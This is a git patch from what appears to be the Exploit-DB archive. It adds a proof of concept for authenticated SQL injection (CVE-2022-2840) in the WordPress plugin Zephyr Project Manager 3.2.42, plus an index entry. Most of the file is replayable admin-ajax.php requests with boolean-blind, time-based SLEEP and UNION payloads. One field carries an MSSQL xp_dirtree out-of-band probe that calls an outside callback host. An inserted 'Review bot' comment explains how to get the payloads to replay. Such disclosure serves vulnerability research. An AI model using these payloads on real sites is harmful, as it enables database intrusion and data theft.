From 4d6a64eb6bd39cb2ce182dc0eca03d69a490a6f2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 7 Oct 2022 05:01:49 +0000
Subject: [PATCH] DB: 2022-10-07

1 changes to exploits/shellcodes

Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi

---
 exploits/php/webapps/51024.txt | 118 +++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 119 insertions(+)
 create mode 100644 exploits/php/webapps/51024.txt

diff --git a/exploits/php/webapps/51024.txt b/exploits/php/webapps/51024.txt
new file mode 100644
index 000000000..1a04ac9b0
--- /dev/null
+++ b/exploits/php/webapps/51024.txt
@@ -0,0 +1,118 @@
+# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi
+# Date: 14-08-2022
+# Exploit Author: Rizacan Tufan
+# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated
+# Software Link: https://wordpress.org/plugins/zephyr-project-manager/
+# Vendor Homepage: https://zephyr-one.com/
+# Version: 3.2.42
+# Tested on: Windows, Linux
+# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)
+
+# Description
+
+Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.
+
+It has been determined that the data coming from the input field in most places throughout the application are used in=20
+the query without any sanitize and validation.
+
+The details of the discovery are given below.
+
+# Proof of Concept (PoC)=20
+
+The details of the various SQL Injection on the application are given below.
+
+## Endpoint of Get Project Data.
+
+Sample Request :=20
+
+POST /wp-admin/admin-ajax.php HTTP/2
+Host: vuln.local
+Cookie: ...
+...
+Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects
+Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 74
+Origin: https://vuln.local
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+
+action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7
+
+Payload :=20
+
+---
+Parameter: project_id (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7
+
+ Type: time-based blind
+ Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)
+ Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 20 columns
+ Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7
+---
+
+
+## Endpoint of Get Task Data.
+
+Sample Request :=20
+
+POST /wp-admin/admin-ajax.php HTTP/2
+Host: vuln.local
+Cookie: ...
+...
+Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks
+Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 51
+Origin: https://vuln.local
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+
+task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7
+
+Payload :=20
+
+---
+Parameter: task_id (POST)
+ Type: time-based blind
+ Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
+ Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7
+---
+
+## Endpoint of New Task.
+
+Sample Request :=20
+
+POST /wp-admin/admin-ajax.php HTTP/2
+Host: vuln.local
+Cookie: ...
+...
+Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks
+Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 337
+Origin: https://vuln.local
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+
+task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7
+
+Payload :=20
+
+---
+Parameter: task_project (POST)
+ Type: time-based blind
+ Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
+ Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7
+---
\ No newline at end of file
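Review bot: Every request in the PoC reuses the literal `zpm_nonce=22858bf3a7` together with an elided `Cookie: ...`, but a WordPress nonce is tied to the logged-in session and expires, so if the handler verifies it the payloads as written will presumably be rejected by admin-ajax.php until the reader logs in and harvests a fresh value; the advisory never states this, nor which role is required, even though the blog-post URL in the header ends in "-authenticated". I would add a line under "# Proof of Concept (PoC)": `# Requires an authenticated WordPress session; obtain a current zpm_nonce from the plugin admin page source before replaying any request below.` The third payload's `status=rrrr-declare-q-varchar-99-...-exec-master-dbo-xp-dirtree-q` is a leftover sqlmap MSSQL out-of-band probe that has nothing to do with the MySQL `task_project` injection being demonstrated and should be reverted to `status=test` so the PoC is a minimal reproducer. If the `=3D`/`=20` sequences are in the committed file rather than only the mail's quoted-printable transport encoding, the payloads cannot be copied verbatim and the file should be decoded before publication.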
diff --git a/files_exploits.csv b/files_exploits.csv
index 5bcd9fcac..952f95c0a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -45085,3 +45085,4 @@ id,file,description,date,author,type,platform,port
 51021,exploits/php/webapps/51021.txt,"Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
 51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
 51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,
+51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",1970-01-01,"Rizacan Tufan",webapps,php,